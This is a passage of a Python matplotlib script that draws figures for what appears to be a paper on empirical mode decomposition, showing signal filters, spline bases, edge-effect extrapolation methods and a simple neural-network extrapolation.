axs[0].plot(0.85 * np.pi * np.ones(101), np.linspace(-3, 3, 101), '--', c='black')
axs[0].plot(1.15 * np.pi * np.ones(101), np.linspace(-3, 3, 101), '--', c='black')
axs[0].set_yticks(ticks=[-2, 0, 2])
axs[0].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[0].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[1].plot(preprocess_time, preprocess_time_series, label='x(t)')
axs[1].plot(pseudo_alg_time, pseudo_alg_time_series, '--', c='purple', label=textwrap.fill('Noiseless time series', 12))
axs[1].plot(preprocess_time, preprocess.mean_filter(window_width=window)[1], label=textwrap.fill('Mean filter', 12))
axs[1].plot(preprocess_time, preprocess.median_filter(window_width=window)[1], label=textwrap.fill('Median filter', 13))
axs[1].plot(preprocess_time, preprocess.winsorize(window_width=window, a=0.8)[1], label=textwrap.fill('Winsorize filter', 12))
axs[1].plot(preprocess_time, preprocess.winsorize_interpolate(window_width=window, a=0.8)[1],
            label=textwrap.fill('Winsorize interpolation filter', 14))
axs[1].plot(preprocess_time, preprocess.quantile_filter(window_width=window, q=0.90)[1], c='grey',
label=textwrap.fill('Quantile window', 12))
axs[1].plot(preprocess_time, preprocess.quantile_filter(window_width=window, q=0.10)[1], c='grey')
axs[1].set_xlim(0.85 * np.pi, 1.15 * np.pi)
axs[1].set_ylim(-3, 3)
axs[1].set_yticks(ticks=[-2, 0, 2])
axs[1].set_xticks(ticks=[np.pi])
axs[1].set_xticklabels(labels=[r'$\pi$'])
box_0 = axs[0].get_position()
axs[0].set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.85, box_0.height])
axs[0].legend(loc='center left', bbox_to_anchor=(1, -0.15))
box_1 = axs[1].get_position()
axs[1].set_position([box_1.x0 - 0.05, box_1.y0, box_1.width * 0.85, box_1.height])
plt.savefig('jss_figures/preprocess_filter.png')
plt.show()
# plot 1e - addition
fig, axs = plt.subplots(2, 1)
fig.subplots_adjust(hspace=0.4)
figure_size = plt.gcf().get_size_inches()
factor = 0.8
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.gcf().subplots_adjust(bottom=0.10)
axs[0].set_title('Preprocess Smoothing Demonstration')
axs[1].set_title('Zoomed Region')
axs[0].plot(preprocess_time, preprocess_time_series, label='x(t)')
axs[0].plot(pseudo_alg_time, pseudo_alg_time_series, '--', c='purple',
label=textwrap.fill('Noiseless time series', 12))
axs[0].plot(preprocess_time, preprocess.hp()[1],
label=textwrap.fill('Hodrick-Prescott smoothing', 12))
axs[0].plot(preprocess_time, preprocess.hw(order=51)[1],
label=textwrap.fill('Henderson-Whittaker smoothing', 13))
downsampled_and_decimated = preprocess.downsample()
axs[0].plot(downsampled_and_decimated[0], downsampled_and_decimated[1],
label=textwrap.fill('Downsampled & decimated', 11))
downsampled = preprocess.downsample(decimate=False)
axs[0].plot(downsampled[0], downsampled[1],
label=textwrap.fill('Downsampled', 13))
axs[0].plot(np.linspace(0.85 * np.pi, 1.15 * np.pi, 101), -3 * np.ones(101), '--', c='black',
label=textwrap.fill('Zoomed region', 10))
axs[0].plot(np.linspace(0.85 * np.pi, 1.15 * np.pi, 101), 3 * np.ones(101), '--', c='black')
axs[0].plot(0.85 * np.pi * np.ones(101), np.linspace(-3, 3, 101), '--', c='black')
axs[0].plot(1.15 * np.pi * np.ones(101), np.linspace(-3, 3, 101), '--', c='black')
axs[0].set_yticks(ticks=[-2, 0, 2])
axs[0].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[0].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[1].plot(preprocess_time, preprocess_time_series, label='x(t)')
axs[1].plot(pseudo_alg_time, pseudo_alg_time_series, '--', c='purple',
label=textwrap.fill('Noiseless time series', 12))
axs[1].plot(preprocess_time, preprocess.hp()[1],
label=textwrap.fill('Hodrick-Prescott smoothing', 12))
axs[1].plot(preprocess_time, preprocess.hw(order=51)[1],
label=textwrap.fill('Henderson-Whittaker smoothing', 13))
axs[1].plot(downsampled_and_decimated[0], downsampled_and_decimated[1],
label=textwrap.fill('Downsampled & decimated', 13))
axs[1].plot(downsampled[0], downsampled[1],
label=textwrap.fill('Downsampled', 13))
axs[1].set_xlim(0.85 * np.pi, 1.15 * np.pi)
axs[1].set_ylim(-3, 3)
axs[1].set_yticks(ticks=[-2, 0, 2])
axs[1].set_xticks(ticks=[np.pi])
axs[1].set_xticklabels(labels=[r'$\pi$'])
box_0 = axs[0].get_position()
axs[0].set_position([box_0.x0 - 0.06, box_0.y0, box_0.width * 0.85, box_0.height])
axs[0].legend(loc='center left', bbox_to_anchor=(1, -0.15))
box_1 = axs[1].get_position()
axs[1].set_position([box_1.x0 - 0.06, box_1.y0, box_1.width * 0.85, box_1.height])
plt.savefig('jss_figures/preprocess_smooth.png')
plt.show()
# plot 2
fig, axs = plt.subplots(1, 2, sharey=True)
axs[0].set_title('Cubic B-Spline Bases')
axs[0].plot(time, b_spline_basis[2, :].T, '--', label='Basis 1')
axs[0].plot(time, b_spline_basis[3, :].T, '--', label='Basis 2')
axs[0].plot(time, b_spline_basis[4, :].T, '--', label='Basis 3')
axs[0].plot(time, b_spline_basis[5, :].T, '--', label='Basis 4')
axs[0].legend(loc='upper left')
axs[0].plot(5 * np.ones(100), np.linspace(-0.2, 0.8, 100), 'k-')
axs[0].plot(6 * np.ones(100), np.linspace(-0.2, 0.8, 100), 'k-')
axs[0].set_xticks([5, 6])
axs[0].set_xticklabels([r'$ \tau_k $', r'$ \tau_{k+1} $'])
axs[0].set_xlim(4.5, 6.5)
axs[1].set_title('Cubic Hermite Spline Bases')
axs[1].plot(time, chsi_basis[10, :].T, '--')
axs[1].plot(time, chsi_basis[11, :].T, '--')
axs[1].plot(time, chsi_basis[12, :].T, '--')
axs[1].plot(time, chsi_basis[13, :].T, '--')
axs[1].plot(5 * np.ones(100), np.linspace(-0.2, 1.2, 100), 'k-')
axs[1].plot(6 * np.ones(100), np.linspace(-0.2, 1.2, 100), 'k-')
axs[1].set_xticks([5, 6])
axs[1].set_xticklabels([r'$ \tau_k $', r'$ \tau_{k+1} $'])
axs[1].set_xlim(4.5, 6.5)
plt.savefig('jss_figures/comparing_bases.png')
plt.show()
# plot 3
a = 0.25
width = 0.2
time = np.linspace(0, (5 - a) * np.pi, 1001)
time_series = np.cos(time) + np.cos(5 * time)
utils = emd_utils.Utility(time=time, time_series=time_series)
max_bool = utils.max_bool_func_1st_order_fd()
maxima_x = time[max_bool]
maxima_y = time_series[max_bool]
min_bool = utils.min_bool_func_1st_order_fd()
minima_x = time[min_bool]
minima_y = time_series[min_bool]
max_dash_time = np.linspace(maxima_x[-1] - width, maxima_x[-1] + width, 101)
max_dash = maxima_y[-1] * np.ones_like(max_dash_time)
min_dash_time = np.linspace(minima_x[-1] - width, minima_x[-1] + width, 101)
min_dash = minima_y[-1] * np.ones_like(min_dash_time)
dash_1_time = np.linspace(maxima_x[-1], minima_x[-1], 101)
dash_1 = np.linspace(maxima_y[-1], minima_y[-1], 101)
max_discard = maxima_y[-1]
max_discard_time = minima_x[-1] - maxima_x[-1] + minima_x[-1]
max_discard_dash_time = np.linspace(max_discard_time - width, max_discard_time + width, 101)
max_discard_dash = max_discard * np.ones_like(max_discard_dash_time)
dash_2_time = np.linspace(minima_x[-1], max_discard_time, 101)
dash_2 = np.linspace(minima_y[-1], max_discard, 101)
end_point_time = time[-1]
end_point = time_series[-1]
time_reflect = np.linspace((5 - a) * np.pi, (5 + a) * np.pi, 101)
time_series_reflect = np.flip(np.cos(np.linspace((5 - 2.6 * a) * np.pi,
(5 - a) * np.pi, 101)) + np.cos(5 * np.linspace((5 - 2.6 * a) * np.pi,
(5 - a) * np.pi, 101)))
time_series_anti_reflect = time_series_reflect[0] - time_series_reflect
utils = emd_utils.Utility(time=time, time_series=time_series_anti_reflect)
anti_max_bool = utils.max_bool_func_1st_order_fd()
anti_max_point_time = time_reflect[anti_max_bool]
anti_max_point = time_series_anti_reflect[anti_max_bool]
utils = emd_utils.Utility(time=time, time_series=time_series_reflect)
no_anchor_max_time = time_reflect[utils.max_bool_func_1st_order_fd()]
no_anchor_max = time_series_reflect[utils.max_bool_func_1st_order_fd()]
point_1 = 5.4
length_distance = np.linspace(maxima_y[-1], minima_y[-1], 101)
length_distance_time = point_1 * np.pi * np.ones_like(length_distance)
length_time = np.linspace(point_1 * np.pi - width, point_1 * np.pi + width, 101)
length_top = maxima_y[-1] * np.ones_like(length_time)
length_bottom = minima_y[-1] * np.ones_like(length_time)
point_2 = 5.2
length_distance_2 = np.linspace(time_series[-1], minima_y[-1], 101)
length_distance_time_2 = point_2 * np.pi * np.ones_like(length_distance_2)
length_time_2 = np.linspace(point_2 * np.pi - width, point_2 * np.pi + width, 101)
length_top_2 = time_series[-1] * np.ones_like(length_time_2)
length_bottom_2 = minima_y[-1] * np.ones_like(length_time_2)
symmetry_axis_1_time = minima_x[-1] * np.ones(101)
symmetry_axis_2_time = time[-1] * np.ones(101)
symmetry_axis = np.linspace(-2, 2, 101)
end_time = np.linspace(time[-1] - width, time[-1] + width, 101)
end_signal = time_series[-1] * np.ones_like(end_time)
anti_symmetric_time = np.linspace(time[-1] - 0.5, time[-1] + 0.5, 101)
anti_symmetric_signal = time_series[-1] * np.ones_like(anti_symmetric_time)
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.plot(time, time_series, linewidth=2, label='Signal')
plt.title('Symmetry Edge Effects Example')
plt.plot(time_reflect, time_series_reflect, 'g--', linewidth=2, label=textwrap.fill('Symmetric signal', 10))
plt.plot(time_reflect[:51], time_series_anti_reflect[:51], '--', c='purple', linewidth=2,
         label=textwrap.fill('Anti-symmetric signal', 10))
plt.plot(max_dash_time, max_dash, 'k-')
plt.plot(min_dash_time, min_dash, 'k-')
plt.plot(dash_1_time, dash_1, 'k--')
plt.plot(dash_2_time, dash_2, 'k--')
plt.plot(length_distance_time, length_distance, 'k--')
plt.plot(length_distance_time_2, length_distance_2, 'k--')
plt.plot(length_time, length_top, 'k-')
plt.plot(length_time, length_bottom, 'k-')
plt.plot(length_time_2, length_top_2, 'k-')
plt.plot(length_time_2, length_bottom_2, 'k-')
plt.plot(end_time, end_signal, 'k-')
plt.plot(symmetry_axis_1_time, symmetry_axis, 'r--', zorder=1)
plt.plot(anti_symmetric_time, anti_symmetric_signal, 'r--', zorder=1)
plt.plot(symmetry_axis_2_time, symmetry_axis, 'r--', label=textwrap.fill('Axes of symmetry', 10), zorder=1)
plt.text(5.1 * np.pi, -0.7, r'$\beta$L')
plt.text(5.34 * np.pi, -0.05, 'L')
plt.scatter(maxima_x, maxima_y, c='r', zorder=4, label='Maxima')
plt.scatter(minima_x, minima_y, c='b', zorder=4, label='Minima')
plt.scatter(max_discard_time, max_discard, c='purple', zorder=4, label=textwrap.fill('Symmetric Discard maxima', 10))
plt.scatter(end_point_time, end_point, c='orange', zorder=4, label=textwrap.fill('Symmetric Anchor maxima', 10))
plt.scatter(anti_max_point_time, anti_max_point, c='green', zorder=4, label=textwrap.fill('Anti-Symmetric maxima', 10))
plt.scatter(no_anchor_max_time, no_anchor_max, c='gray', zorder=4, label=textwrap.fill('Symmetric maxima', 10))
plt.xlim(3.9 * np.pi, 5.5 * np.pi)
plt.xticks((4 * np.pi, 5 * np.pi), (r'4$\pi$', r'5$\pi$'))
plt.yticks((-2, -1, 0, 1, 2), ('-2', '-1', '0', '1', '2'))
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.85, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/edge_effects_symmetry_anti.png')
plt.show()
# plot 4
a = 0.21
width = 0.2
time = np.linspace(0, (5 - a) * np.pi, 1001)
time_series = np.cos(time) + np.cos(5 * time)
utils = emd_utils.Utility(time=time, time_series=time_series)
max_bool = utils.max_bool_func_1st_order_fd()
maxima_x = time[max_bool]
maxima_y = time_series[max_bool]
min_bool = utils.min_bool_func_1st_order_fd()
minima_x = time[min_bool]
minima_y = time_series[min_bool]
max_dash_1 = np.linspace(maxima_y[-1] - width, maxima_y[-1] + width, 101)
max_dash_2 = np.linspace(maxima_y[-2] - width, maxima_y[-2] + width, 101)
max_dash_time_1 = maxima_x[-1] * np.ones_like(max_dash_1)
max_dash_time_2 = maxima_x[-2] * np.ones_like(max_dash_1)
min_dash_1 = np.linspace(minima_y[-1] - width, minima_y[-1] + width, 101)
min_dash_2 = np.linspace(minima_y[-2] - width, minima_y[-2] + width, 101)
min_dash_time_1 = minima_x[-1] * np.ones_like(min_dash_1)
min_dash_time_2 = minima_x[-2] * np.ones_like(min_dash_1)
dash_1_time = np.linspace(maxima_x[-1], minima_x[-1], 101)
dash_1 = np.linspace(maxima_y[-1], minima_y[-1], 101)
dash_2_time = np.linspace(maxima_x[-1], minima_x[-2], 101)
dash_2 = np.linspace(maxima_y[-1], minima_y[-2], 101)
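# slope-based edge effect: extrapolate a new maximum and minimum using the slopes between the final extrema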
s1 = (minima_y[-2] - maxima_y[-1]) / (minima_x[-2] - maxima_x[-1])
slope_based_maximum_time = maxima_x[-1] + (maxima_x[-1] - maxima_x[-2])
slope_based_maximum = minima_y[-1] + (slope_based_maximum_time - minima_x[-1]) * s1
max_dash_time_3 = slope_based_maximum_time * np.ones_like(max_dash_1)
max_dash_3 = np.linspace(slope_based_maximum - width, slope_based_maximum + width, 101)
dash_3_time = np.linspace(minima_x[-1], slope_based_maximum_time, 101)
dash_3 = np.linspace(minima_y[-1], slope_based_maximum, 101)
s2 = (minima_y[-1] - maxima_y[-1]) / (minima_x[-1] - maxima_x[-1])
slope_based_minimum_time = minima_x[-1] + (minima_x[-1] - minima_x[-2])
slope_based_minimum = slope_based_maximum - (slope_based_maximum_time - slope_based_minimum_time) * s2
min_dash_time_3 = slope_based_minimum_time * np.ones_like(min_dash_1)
min_dash_3 = np.linspace(slope_based_minimum - width, slope_based_minimum + width, 101)
dash_4_time = np.linspace(slope_based_maximum_time, slope_based_minimum_time)
dash_4 = np.linspace(slope_based_maximum, slope_based_minimum)
maxima_dash = np.linspace(2.5 - width, 2.5 + width, 101)
maxima_dash_time_1 = maxima_x[-2] * np.ones_like(maxima_dash)
maxima_dash_time_2 = maxima_x[-1] * np.ones_like(maxima_dash)
maxima_dash_time_3 = slope_based_maximum_time * np.ones_like(maxima_dash)
maxima_line_dash_time = np.linspace(maxima_x[-2], slope_based_maximum_time, 101)
maxima_line_dash = 2.5 * np.ones_like(maxima_line_dash_time)
minima_dash = np.linspace(-3.4 - width, -3.4 + width, 101)
minima_dash_time_1 = minima_x[-2] * np.ones_like(minima_dash)
minima_dash_time_2 = minima_x[-1] * np.ones_like(minima_dash)
minima_dash_time_3 = slope_based_minimum_time * np.ones_like(minima_dash)
minima_line_dash_time = np.linspace(minima_x[-2], slope_based_minimum_time, 101)
minima_line_dash = -3.4 * np.ones_like(minima_line_dash_time)
# slightly edit signal to make difference between slope-based method and improved slope-based method more clear
time_series[time >= minima_x[-1]] = 1.5 * (time_series[time >= minima_x[-1]] - time_series[time == minima_x[-1]]) + \
time_series[time == minima_x[-1]]
improved_slope_based_maximum_time = time[-1]
improved_slope_based_maximum = time_series[-1]
improved_slope_based_minimum_time = slope_based_minimum_time
improved_slope_based_minimum = improved_slope_based_maximum + s2 * (improved_slope_based_minimum_time -
improved_slope_based_maximum_time)
min_dash_4 = np.linspace(improved_slope_based_minimum - width, improved_slope_based_minimum + width, 101)
min_dash_time_4 = improved_slope_based_minimum_time * np.ones_like(min_dash_4)
dash_final_time = np.linspace(improved_slope_based_maximum_time, improved_slope_based_minimum_time, 101)
dash_final = np.linspace(improved_slope_based_maximum, improved_slope_based_minimum, 101)
ax = plt.subplot(111)
figure_size = plt.gcf().get_size_inches()
factor = 0.9
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.gcf().subplots_adjust(bottom=0.10)
plt.plot(time, time_series, linewidth=2, label='Signal')
plt.title('Slope-Based Edge Effects Example')
plt.plot(max_dash_time_1, max_dash_1, 'k-')
plt.plot(max_dash_time_2, max_dash_2, 'k-')
plt.plot(max_dash_time_3, max_dash_3, 'k-')
plt.plot(min_dash_time_1, min_dash_1, 'k-')
plt.plot(min_dash_time_2, min_dash_2, 'k-')
plt.plot(min_dash_time_3, min_dash_3, 'k-')
plt.plot(min_dash_time_4, min_dash_4, 'k-')
plt.plot(maxima_dash_time_1, maxima_dash, 'k-')
plt.plot(maxima_dash_time_2, maxima_dash, 'k-')
plt.plot(maxima_dash_time_3, maxima_dash, 'k-')
plt.plot(minima_dash_time_1, minima_dash, 'k-')
plt.plot(minima_dash_time_2, minima_dash, 'k-')
plt.plot(minima_dash_time_3, minima_dash, 'k-')
plt.text(4.34 * np.pi, -3.2, r'$\Delta{t^{min}_{m}}$')
plt.text(4.74 * np.pi, -3.2, r'$\Delta{t^{min}_{m}}$')
plt.text(4.12 * np.pi, 2, r'$\Delta{t^{max}_{M}}$')
plt.text(4.50 * np.pi, 2, r'$\Delta{t^{max}_{M}}$')
plt.text(4.30 * np.pi, 0.35, r'$s_1$')
plt.text(4.43 * np.pi, -0.20, r'$s_2$')
plt.text(4.30 * np.pi + (minima_x[-1] - minima_x[-2]), 0.35 + (minima_y[-1] - minima_y[-2]), r'$s_1$')
plt.text(4.43 * np.pi + (slope_based_minimum_time - minima_x[-1]),
-0.20 + (slope_based_minimum - minima_y[-1]), r'$s_2$')
plt.text(4.50 * np.pi + (slope_based_minimum_time - minima_x[-1]),
1.20 + (slope_based_minimum - minima_y[-1]), r'$s_2$')
plt.plot(minima_line_dash_time, minima_line_dash, 'k--')
plt.plot(maxima_line_dash_time, maxima_line_dash, 'k--')
plt.plot(dash_1_time, dash_1, 'k--')
plt.plot(dash_2_time, dash_2, 'k--')
plt.plot(dash_3_time, dash_3, 'k--')
plt.plot(dash_4_time, dash_4, 'k--')
plt.plot(dash_final_time, dash_final, 'k--')
plt.scatter(maxima_x, maxima_y, c='r', zorder=4, label='Maxima')
plt.scatter(minima_x, minima_y, c='b', zorder=4, label='Minima')
plt.scatter(slope_based_maximum_time, slope_based_maximum, c='orange', zorder=4,
label=textwrap.fill('Slope-based maximum', 11))
plt.scatter(slope_based_minimum_time, slope_based_minimum, c='purple', zorder=4,
label=textwrap.fill('Slope-based minimum', 11))
plt.scatter(improved_slope_based_maximum_time, improved_slope_based_maximum, c='deeppink', zorder=4,
label=textwrap.fill('Improved slope-based maximum', 11))
plt.scatter(improved_slope_based_minimum_time, improved_slope_based_minimum, c='dodgerblue', zorder=4,
label=textwrap.fill('Improved slope-based minimum', 11))
plt.xlim(3.9 * np.pi, 5.5 * np.pi)
plt.xticks((4 * np.pi, 5 * np.pi), (r'4$\pi$', r'5$\pi$'))
plt.yticks((-3, -2, -1, 0, 1, 2), ('-3', '-2', '-1', '0', '1', '2'))
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.85, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/edge_effects_slope_based.png')
plt.show()
# plot 5
a = 0.25
width = 0.2
time = np.linspace(0, (5 - a) * np.pi, 1001)
time_series = np.cos(time) + np.cos(5 * time)
utils = emd_utils.Utility(time=time, time_series=time_series)
max_bool = utils.max_bool_func_1st_order_fd()
maxima_x = time[max_bool]
maxima_y = time_series[max_bool]
min_bool = utils.min_bool_func_1st_order_fd()
minima_x = time[min_bool]
minima_y = time_series[min_bool]
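# amplitudes (A) and periods (P) of the final half-waves, used to build the Huang, Coughlin, and average characteristic waves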
A2 = np.abs(maxima_y[-2] - minima_y[-2]) / 2
A1 = np.abs(maxima_y[-1] - minima_y[-1]) / 2
P2 = 2 * np.abs(maxima_x[-2] - minima_x[-2])
P1 = 2 * np.abs(maxima_x[-1] - minima_x[-1])
Huang_time = (P1 / P2) * (time[time >= maxima_x[-2]] - time[time == maxima_x[-2]]) + maxima_x[-1]
Huang_wave = (A1 / A2) * (time_series[time >= maxima_x[-2]] - time_series[time == maxima_x[-2]]) + maxima_y[-1]
Coughlin_time = Huang_time
Coughlin_wave = A1 * np.cos(2 * np.pi * (1 / P1) * (Coughlin_time - Coughlin_time[0]))
Average_max_time = maxima_x[-1] + (maxima_x[-1] - maxima_x[-2])
Average_max = (maxima_y[-2] + maxima_y[-1]) / 2
Average_min_time = minima_x[-1] + (minima_x[-1] - minima_x[-2])
Average_min = (minima_y[-2] + minima_y[-1]) / 2
utils_Huang = emd_utils.Utility(time=time, time_series=Huang_wave)
Huang_max_bool = utils_Huang.max_bool_func_1st_order_fd()
Huang_min_bool = utils_Huang.min_bool_func_1st_order_fd()
utils_Coughlin = emd_utils.Utility(time=time, time_series=Coughlin_wave)
Coughlin_max_bool = utils_Coughlin.max_bool_func_1st_order_fd()
Coughlin_min_bool = utils_Coughlin.min_bool_func_1st_order_fd()
Huang_max_time = Huang_time[Huang_max_bool]
Huang_max = Huang_wave[Huang_max_bool]
Huang_min_time = Huang_time[Huang_min_bool]
Huang_min = Huang_wave[Huang_min_bool]
Coughlin_max_time = Coughlin_time[Coughlin_max_bool]
Coughlin_max = Coughlin_wave[Coughlin_max_bool]
Coughlin_min_time = Coughlin_time[Coughlin_min_bool]
Coughlin_min = Coughlin_wave[Coughlin_min_bool]
max_2_x_time = np.linspace(maxima_x[-2] - width, maxima_x[-2] + width, 101)
max_2_x_time_side = np.linspace(5.3 * np.pi - width, 5.3 * np.pi + width, 101)
max_2_x = maxima_y[-2] * np.ones_like(max_2_x_time)
min_2_x_time = np.linspace(minima_x[-2] - width, minima_x[-2] + width, 101)
min_2_x_time_side = np.linspace(5.3 * np.pi - width, 5.3 * np.pi + width, 101)
min_2_x = minima_y[-2] * np.ones_like(min_2_x_time)
dash_max_min_2_x = np.linspace(minima_y[-2], maxima_y[-2], 101)
dash_max_min_2_x_time = 5.3 * np.pi * np.ones_like(dash_max_min_2_x)
max_2_y = np.linspace(maxima_y[-2] - width, maxima_y[-2] + width, 101)
max_2_y_side = np.linspace(-1.8 - width, -1.8 + width, 101)
max_2_y_time = maxima_x[-2] * np.ones_like(max_2_y)
min_2_y = np.linspace(minima_y[-2] - width, minima_y[-2] + width, 101)
min_2_y_side = np.linspace(-1.8 - width, -1.8 + width, 101)
min_2_y_time = minima_x[-2] * np.ones_like(min_2_y)
dash_max_min_2_y_time = np.linspace(minima_x[-2], maxima_x[-2], 101)
dash_max_min_2_y = -1.8 * np.ones_like(dash_max_min_2_y_time)
max_1_x_time = np.linspace(maxima_x[-1] - width, maxima_x[-1] + width, 101)
max_1_x_time_side = np.linspace(5.4 * np.pi - width, 5.4 * np.pi + width, 101)
max_1_x = maxima_y[-1] * np.ones_like(max_1_x_time)
min_1_x_time = np.linspace(minima_x[-1] - width, minima_x[-1] + width, 101)
min_1_x_time_side = np.linspace(5.4 * np.pi - width, 5.4 * np.pi + width, 101)
min_1_x = minima_y[-1] * np.ones_like(min_1_x_time)
dash_max_min_1_x = np.linspace(minima_y[-1], maxima_y[-1], 101)
dash_max_min_1_x_time = 5.4 * np.pi * np.ones_like(dash_max_min_1_x)
max_1_y = np.linspace(maxima_y[-1] - width, maxima_y[-1] + width, 101)
max_1_y_side = np.linspace(-2.1 - width, -2.1 + width, 101)
max_1_y_time = maxima_x[-1] * np.ones_like(max_1_y)
min_1_y = np.linspace(minima_y[-1] - width, minima_y[-1] + width, 101)
min_1_y_side = np.linspace(-2.1 - width, -2.1 + width, 101)
min_1_y_time = minima_x[-1] * np.ones_like(min_1_y)
dash_max_min_1_y_time = np.linspace(minima_x[-1], maxima_x[-1], 101)
dash_max_min_1_y = -2.1 * np.ones_like(dash_max_min_1_y_time)
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.title('Characteristic Wave Effects Example')
plt.plot(time, time_series, linewidth=2, label='Signal')
plt.scatter(Huang_max_time, Huang_max, c='magenta', zorder=4, label=textwrap.fill('Huang maximum', 10))
plt.scatter(Huang_min_time, Huang_min, c='lime', zorder=4, label=textwrap.fill('Huang minimum', 10))
plt.scatter(Coughlin_max_time, Coughlin_max, c='darkorange', zorder=4,
label=textwrap.fill('Coughlin maximum', 14))
plt.scatter(Coughlin_min_time, Coughlin_min, c='dodgerblue', zorder=4,
label=textwrap.fill('Coughlin minimum', 14))
plt.scatter(Average_max_time, Average_max, c='orangered', zorder=4,
label=textwrap.fill('Average maximum', 14))
plt.scatter(Average_min_time, Average_min, c='cyan', zorder=4,
label=textwrap.fill('Average minimum', 14))
plt.scatter(maxima_x, maxima_y, c='r', zorder=4, label='Maxima')
plt.scatter(minima_x, minima_y, c='b', zorder=4, label='Minima')
plt.plot(Huang_time, Huang_wave, '--', c='darkviolet', label=textwrap.fill('Huang Characteristic Wave', 14))
plt.plot(Coughlin_time, Coughlin_wave, '--', c='darkgreen', label=textwrap.fill('Coughlin Characteristic Wave', 14))
plt.plot(max_2_x_time, max_2_x, 'k-')
plt.plot(max_2_x_time_side, max_2_x, 'k-')
plt.plot(min_2_x_time, min_2_x, 'k-')
plt.plot(min_2_x_time_side, min_2_x, 'k-')
plt.plot(dash_max_min_2_x_time, dash_max_min_2_x, 'k--')
plt.text(5.16 * np.pi, 0.85, r'$2a_2$')
plt.plot(max_2_y_time, max_2_y, 'k-')
plt.plot(max_2_y_time, max_2_y_side, 'k-')
plt.plot(min_2_y_time, min_2_y, 'k-')
plt.plot(min_2_y_time, min_2_y_side, 'k-')
plt.plot(dash_max_min_2_y_time, dash_max_min_2_y, 'k--')
plt.text(4.08 * np.pi, -2.2, r'$\frac{p_2}{2}$')
plt.plot(max_1_x_time, max_1_x, 'k-')
plt.plot(max_1_x_time_side, max_1_x, 'k-')
plt.plot(min_1_x_time, min_1_x, 'k-')
plt.plot(min_1_x_time_side, min_1_x, 'k-')
plt.plot(dash_max_min_1_x_time, dash_max_min_1_x, 'k--')
plt.text(5.42 * np.pi, -0.1, r'$2a_1$')
plt.plot(max_1_y_time, max_1_y, 'k-')
plt.plot(max_1_y_time, max_1_y_side, 'k-')
plt.plot(min_1_y_time, min_1_y, 'k-')
plt.plot(min_1_y_time, min_1_y_side, 'k-')
plt.plot(dash_max_min_1_y_time, dash_max_min_1_y, 'k--')
plt.text(4.48 * np.pi, -2.5, r'$\frac{p_1}{2}$')
plt.xlim(3.9 * np.pi, 5.6 * np.pi)
plt.xticks((4 * np.pi, 5 * np.pi), (r'4$\pi$', r'5$\pi$'))
plt.yticks((-2, -1, 0, 1, 2), ('-2', '-1', '0', '1', '2'))
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.84, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/edge_effects_characteristic_wave.png')
plt.show()
# plot 6
t = np.linspace(5, 95, 100)
signal_orig = np.cos(2 * np.pi * t / 50) + 0.6 * np.cos(2 * np.pi * t / 25) + 0.5 * np.sin(2 * np.pi * t / 200)
util_nn = emd_utils.Utility(time=t, time_series=signal_orig)
maxima = signal_orig[util_nn.max_bool_func_1st_order_fd()]
minima = signal_orig[util_nn.min_bool_func_1st_order_fd()]
cs_max = CubicSpline(t[util_nn.max_bool_func_1st_order_fd()], maxima)
cs_min = CubicSpline(t[util_nn.min_bool_func_1st_order_fd()], minima)
time = np.linspace(0, 5 * np.pi, 1001)
lsq_signal = np.cos(time) + np.cos(5 * time)
knots = np.linspace(0, 5 * np.pi, 101)
time_extended = time_extension(time)
time_series_extended = np.full_like(time_extended, np.nan)  # NaN padding; the known signal is inserted in the middle below
time_series_extended[int(len(lsq_signal) - 1):int(2 * (len(lsq_signal) - 1) + 1)] = lsq_signal
neural_network_m = 200
neural_network_k = 100
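# single-neuron extrapolation: predict each of the last m samples from the k samples preceding it, plus a bias term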
# forward ->
P = np.zeros((int(neural_network_k + 1), neural_network_m))
for col in range(neural_network_m):
P[:-1, col] = lsq_signal[(-(neural_network_m + neural_network_k - col)):(-(neural_network_m - col))]
P[-1, col] = 1 # for additive constant
t = lsq_signal[-neural_network_m:]
# test - top
seed_weights = np.ones(neural_network_k) / neural_network_k
weights = 0 * seed_weights.copy()
train_input = P[:-1, :]
lr = 0.01
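# full-batch gradient descent on the squared prediction error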
for iterations in range(1000):
output = np.matmul(weights, train_input)
error = (t - output)
gradients = error * (- train_input)
# guess average gradients
average_gradients = np.mean(gradients, axis=1)
# steepest descent
max_gradient_vector = average_gradients * (np.abs(average_gradients) == max(np.abs(average_gradients)))
adjustment = - lr * average_gradients
# adjustment = - lr * max_gradient_vector
weights += adjustment
# test - bottom
weights_right = np.hstack((weights, 0))
max_count_right = 0
min_count_right = 0
i_right = 0
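# extend the signal forwards one sample at a time until the extension contains at least one maximum and one minimum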
while ((max_count_right < 1) or (min_count_right < 1)) and (i_right < len(lsq_signal) - 1):
time_series_extended[int(2 * (len(lsq_signal) - 1) + 1 + i_right)] = \
sum(weights_right * np.hstack((time_series_extended[
int(2 * (len(lsq_signal) - 1) + 1 - neural_network_k + i_right):
int(2 * (len(lsq_signal) - 1) + 1 + i_right)], 1)))
i_right += 1
if i_right > 1:
emd_utils_max = \
emd_utils.Utility(time=time_extended[int(2 * (len(lsq_signal) - 1) + 1):
int(2 * (len(lsq_signal) - 1) + 1 + i_right + 1)],
time_series=time_series_extended[int(2 * (len(lsq_signal) - 1) + 1):
int(2 * (len(lsq_signal) - 1) + 1 + i_right + 1)])
if sum(emd_utils_max.max_bool_func_1st_order_fd()) > 0:
max_count_right += 1
emd_utils_min = \
emd_utils.Utility(time=time_extended[int(2 * (len(lsq_signal) - 1) + 1):
